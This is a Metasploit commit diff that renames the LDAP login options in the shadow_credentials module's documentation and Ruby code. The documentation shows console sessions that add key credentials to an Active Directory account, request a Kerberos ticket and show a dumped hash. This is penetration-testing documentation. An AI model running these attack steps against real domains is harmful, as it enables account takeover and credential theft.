Update the ldap options for shadow credentials

zeroSteiner · zeroSteiner · commit 9ac55c359615 · 2025-05-28T09:32:56.000-04:00
diff --git a/documentation/modules/auxiliary/admin/ldap/shadow_credentials.md b/documentation/modules/auxiliary/admin/ldap/shadow_credentials.md
@@ -109,13 +109,8 @@ Module options (auxiliary/admin/ldap/shadow_credentials):
 
    Name         Current Setting  Required  Description
    ----         ---------------  --------  -----------
-   DOMAIN                        no        The domain to authenticate to
-   PASSWORD                      no        The password to authenticate with
-   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT        389              yes       The target port
    SSL          false            no        Enable SSL on the LDAP connection
    TARGET_USER                   yes       The target to write to
-   USERNAME                      no        The username to authenticate with
 
 
    When ACTION is REMOVE:
@@ -125,6 +120,24 @@ Module options (auxiliary/admin/ldap/shadow_credentials):
    DEVICE_ID                   no        The specific certificate ID to operate on
 
 
+   Used when connecting via an existing SESSION:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   no        The session to run this module on
+
+
+   Used when making a new connection via RHOSTS:
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LDAPDomain                     no        The domain to authenticate to
+   LDAPPassword                   no        The password to authenticate with
+   LDAPUsername                   no        The username to authenticate with
+   RHOSTS                         no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         389              no        The target port
+
+
 Auxiliary action:
 
    Name  Description
@@ -139,8 +152,8 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > set rhosts 20.92.148.129
 rhosts => 20.92.148.129
 msf6 auxiliary(admin/ldap/shadow_credentials) > set domain MSF.LOCAL
 domain => MSF.LOCAL
-msf6 auxiliary(admin/ldap/shadow_credentials) > set username sandy
-username => sandy
+msf6 auxiliary(admin/ldap/shadow_credentials) > set ldapusername sandy
+ldapusername => sandy
 msf6 auxiliary(admin/ldap/shadow_credentials) > set password Password1!
 password => Password1!
 msf6 auxiliary(admin/ldap/shadow_credentials) > set target_user victim
@@ -163,8 +176,8 @@ The LDAP property has been successfully updated. Now we can request a TGT using
 ```msf
 msf6 auxiliary(admin/kerberos/get_ticket) > set rhosts 20.92.148.129
 rhosts => 20.92.148.129
-msf6 auxiliary(admin/kerberos/get_ticket) > set username victim
-username => victim
+msf6 auxiliary(admin/kerberos/get_ticket) > set ldapusername victim
+ldapusername => victim
 msf6 auxiliary(admin/kerberos/get_ticket) > set domain MSF.LOCAL
 domain => MSF.LOCAL
 msf6 auxiliary(admin/kerberos/get_ticket) > set cert_file /home/user/.msf4/loot/20240404115740_default_20.92.148.129_windows.ad.cs_300384.pfx
@@ -205,7 +218,7 @@ Administrator:500:aad3b435b51404eeaad3b435b51404ee:26f8220ed7f1494c5737bd552e661
 In the following example the user `MSF\DESKTOP-H4VEQQHQ$` targets itself. No special permissions are required for this, as computers have some ability to modify their own value by default.
 
 ```msf
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
 [*] Running module against 20.92.148.129
 
 [+] Successfully bound to the LDAP server!
@@ -220,7 +233,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 Note, however, that attempting to add a second credential will fail under these circumstances:
 
 ```msf
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV action=add
 [*] Running module against 20.92.148.129
 
 [+] Successfully bound to the LDAP server!
@@ -240,7 +253,7 @@ for any legitimate user relying on the existing value.
 ```msf
 msf6 auxiliary(admin/ldap/shadow_credentials) > set action flush
 action => flush
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
 [*] Running module against 20.92.148.129
 
 [+] Successfully bound to the LDAP server!
@@ -251,7 +264,7 @@ msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username
 [*] Auxiliary module execution completed
 msf6 auxiliary(admin/ldap/shadow_credentials) > set action add
 action => add
-msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 username=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
+msf6 auxiliary(admin/ldap/shadow_credentials) > run rhost=20.92.148.129 ldapusername=DESKTOP-H971T3AH$ target_user=DESKTOP-H971T3AH$ password=JJ2xSxvop2KERcJu8JMEmzv5sswNZBlV
 [*] Running module against 20.92.148.129
 
 [+] Successfully bound to the LDAP server!
diff --git a/modules/auxiliary/admin/ldap/shadow_credentials.rb b/modules/auxiliary/admin/ldap/shadow_credentials.rb
@@ -67,12 +67,12 @@ def fail_with_ldap_error(message)
   def warn_on_likely_user_error
     ldap_result = @ldap.get_operation_result.table
     if ldap_result[:code] == 50
-      if (datastore['USERNAME'] == datastore['TARGET_USER'] ||
-          datastore['USERNAME'] == datastore['TARGET_USER'] + '$') &&
-         datastore['USERNAME'].end_with?('$') &&
+      if (datastore['LDAPUsername'] == datastore['TARGET_USER'] ||
+          datastore['LDAPUsername'] == datastore['TARGET_USER'] + '$') &&
+         datastore['LDAPUsername'].end_with?('$') &&
          ['add', 'remove'].include?(action.name.downcase)
         print_warning('By default, computer accounts can only update their key credentials if no value already exists. If there is already a value present, you can remove it, and add your own, but any users relying on the existing credentials will not be able to authenticate until you replace the existing value(s).')
-      elsif datastore['USERNAME'] == datastore['TARGET_USER'] && !datastore['USERNAME'].end_with?('$')
+      elsif datastore['LDAPUsername'] == datastore['TARGET_USER'] && !datastore['LDAPUsername'].end_with?('$')
         print_warning('By default, only computer accounts can modify their own properties (not user accounts).')
       end
     end
